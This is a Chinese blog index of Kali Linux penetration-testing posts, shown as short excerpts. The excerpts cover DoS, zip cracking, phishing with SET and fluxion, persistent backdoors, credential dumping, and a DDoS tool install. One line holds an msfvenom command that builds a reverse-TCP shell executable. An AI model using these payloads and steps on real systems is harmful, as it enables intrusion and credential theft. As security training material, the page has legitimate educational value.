随笔分类 - kail linux渗透技术
包括信息的收集
漏洞的查找
漏洞的利用等。。
摘要:在计算机行业,拒绝服务(DoS)或分布式拒绝服务(DDoS)攻击是指不法分子企图让某机器或网络资源无法被预期的用户所使用。虽然执行DoS攻击的方式、动机和目标不一样,但通常包括设法临时性或无限期中断或暂停连接至互联网的主机提供服务。 攻击过程: 1. 你使用hping3执行拒绝服务攻击(即DoS)。
阅读全文
摘要:一个暴力破解zip的工具 用python开发 与kali 自带的fcrackzip类似 git地址:https://github.com/mapyJJJ/python3-for-linux-h-.git
阅读全文
摘要:由于是在虚拟机下实验,仅做示范 终端输入setoolkit启动 依次选择 Social-Engineering Attacks Website Attack Vectors Credential Harvester Attack Method Web Templates 然后设置你的ip 选择goo
阅读全文
摘要:创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创
阅读全文
摘要:在youtube上发现的一个视频 这是一个开源项目 git clone https://github.com/zanyarjamal/zambie.git chmod -R 777 zambie cd zambie ./Installer.sh ./zambie.py youtube地址 https
阅读全文
摘要:现在做一个例子,首先生成一个带有密码的zip的包 zip -P hujhh test.zip test1.txt test2,txt 可以看到密码是5位的纯字母 现在就用我们的这个软件开始破解 fcrackzip -v -b -u -c a -p aaaaa test.zip 不一会就可以看到破解成
阅读全文
摘要:使用步骤 github地址 https://github.com/deltaxflux/fluxion 进入到fluxion目录下 ./fluxion 启动fluxion 启动之后会先检测没有安装的项,讲红色没有安装的 安装完 也许会到依赖项 问题 先看看你的源有没有问题,不行的话,就按提示 安装指
阅读全文
摘要:在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均为creddump套件,的一部分 Chntpw 用来修改Windows SAM文件实现系统密码修改,
阅读全文
摘要:1.hcitool 通过前面讲的升级操作后,在BackTrack4 Linux或者Ubuntu系统下将会安装好蓝牙的全套操作工具,其中就包括hcitool。该工具支持大量的蓝牙设备操作,从扫描到查看设备属性等均支持。关于扫描的具体命令如下: 参数解释: -i,后跟设备名称,这里的蓝牙设备名称就是hc
阅读全文
摘要:kali 里面用 apt-get install weechat 安装完成后,输入 weechat 命令就能启动客户端了 要想使用 IRC,就需要先连接一个 irc 服务器,选择了大名鼎鼎的 chat.freenode.net 服务器。 按照/help server 帮助命令的提示,添加了新的 se
阅读全文
摘要:获取凭证 hashdump模块(post)可以从SAM数据库中导出本地用户账号,credential_collector脚本(post/windows/gather/credentials)也可以从目标设备中收集令牌信息。 脚本和post模块都需要通过“run”命令执行,我在测试环境中运行hashd
阅读全文
摘要:NetCat,在网络工具中有“瑞士军刀”美誉,其有Windows和Linux的版本。因为它短小精悍(1.84版本也不过25k,旧版本或缩减版甚至更小)、功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各
阅读全文
摘要:利用它生成后门 第一种通常情况下速度很快,较稳定,但免杀效果极差 推荐使用第二种 免杀效果好,如下图 第一种是最新的模块,较免杀效果极好。还可伪造图标 第二种是旧的
阅读全文
摘要:在运行框中输入 msconfig 选择启动栏 会跳转到任务管理器,可以管理启动项,可以看到我的启动项里有nc病毒 ,点击禁用即可。
阅读全文
摘要:十、Meterpreter常用命令 1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令) background(进程隐藏至后台) sessions(查看已经成功获取的会话,-i 恢复会话) quit(关闭当前会话) shell (获取系统控制台shell,如
阅读全文
摘要:Metasploit是一个免费的、可下载的渗透测试框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击测试。它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑
阅读全文
摘要:msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/sh
阅读全文
摘要:本次用到的环境: kali(2016.2)32位系统.ip地址:192.168.1.104 目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105 若kali为64位 windows为32 需要安装wine32 ,但64位的kali下无法apt-get instal
阅读全文
摘要:1.获取网站的ip 2.同IP网站查询 ,查询该IP下有几个网站 3.找网站的DNS记录 https://who.is/ ,https://whois.aliyun.com 或其他网址 (寻找注册时的电话,邮箱,地址,联系人,等) 4,确定网站的服务器种类及版本 , kali linux下whatw
阅读全文
浙公网安备 33010602011771号